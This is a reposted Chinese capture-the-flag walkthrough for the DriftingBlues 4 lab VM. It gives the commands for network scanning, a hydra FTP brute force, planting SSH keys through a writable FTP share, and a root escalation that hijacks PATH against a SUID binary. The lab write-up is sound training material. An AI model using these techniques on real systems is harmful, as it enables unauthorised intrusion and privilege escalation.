DriftingBlues 4靶机渗透测试 DriftingBlues__4

原文 EN · 机器翻译 作者:流云技术札 发布:2026-04-18 12:00 收录:2026-09-08 10:33 2 次阅读 约 601 字
摘要:概述 About Release Name : DriftingBlues: 4 Date release : 8 Mar 2021 Author : tasiyanci Series : DriftingBlues Description get flags difficulty: easy about vm: te…
推荐理由:本文涵盖「渗透测试」、「DriftingBlues」、「靶机」等多个主题,重点关注 渗透测试。

概述

About Release

  • Name: DriftingBlues: 4
  • Date release: 8 Mar 2021
  • Author: tasiyanci
  • Series: DriftingBlues

Description

get flags

difficulty: easy

about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

This works better with VirtualBox rather than VMware.

Virtual Machine

  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

Networking

  • DHCP service: Enabled
  • IP address: Automatically assign

渗透

漏洞遍历

扫描存活主机

arp-scan -interface=eth1 --localnet

image

192.168.56.105是另一台靶机
该靶机ip为192.168.56.106

端口探测

nmap -A -sV -T4 -p- 192.168.56.106

image

dirsearch全是403,没跑出东西,上web看一看

image

看到base64,一直进行base64解密然后删除明文部分再解密

image

image

最后跑出来/imfuckingmad.txt

image

一眼brainfuck,随波逐流解了

image

在最下面看到图片url/iTiS3Cr3TbiTCh.png

image

访问是二维码,解码得到url

上网查看一下,暴露了用户名?

image

那然后应该是爆破了

luther
gary
Hubert
clark

爆ftp和ssh

这里用rockyou.txt的前5000条就行了,一般这个爆破不出来就不是爆破的思路了,用hydra九头蛇爆破

hydra -L user.txt -P /usr/share/wordlists/rockyou_5000.txt ftp://192.168.56.106 -I

image

ftp给爆出来了

luther mypics

image

hubert里没东西,把sync_log get下来查看

get sync_log

image

啥都没看到啊
没懂,看看wp

哦,这个hubert的uid与其他不一样是1001,有可能是用户目录!

然后ftp可写,那直接生成ssh私钥连接了呀

本地创建id_rsa id_rsa.pub authorized_keys

然后由ftp上传

cd hubert
mkdir .ssh
cd .ssh
put id_rsa
put id_rsa.pub
put authorized_keys

image

image

成功获得user权限

image

root提权

和driftingblues-3的提权一模一样

查看suid时发现不常见的程序

find / -user root -perm -4000 -print 2>/dev/null

image

看看/usr/bin/getinfo是啥

image

根据上面输出的结果,可以推测这个程序中执行了
ip addr, cat /etc/hosts, uname -a

然后检查一下环境变量

发现环境变量不是只读,那可以进行PATH劫持

readonly 或者
declare -p 变量名

declare -r PATH="/usr/bin:/bin" #  注意这里的 r,代表 readonly

declare -- PATH="/usr/bin:/bin" #  这里是 --,说明没有只读属性

在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip
或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

image

成功提权到root,在~下拿到flag2

image

转载声明:本文转载自原发布平台 (作者:流云技术札), 原文标题《DriftingBlues__4》, 查看原文。 版权归原作者及原发布平台所有,本站仅作收录与展示,未对正文内容作实质性修改; 若涉及侵权请联系本站处理。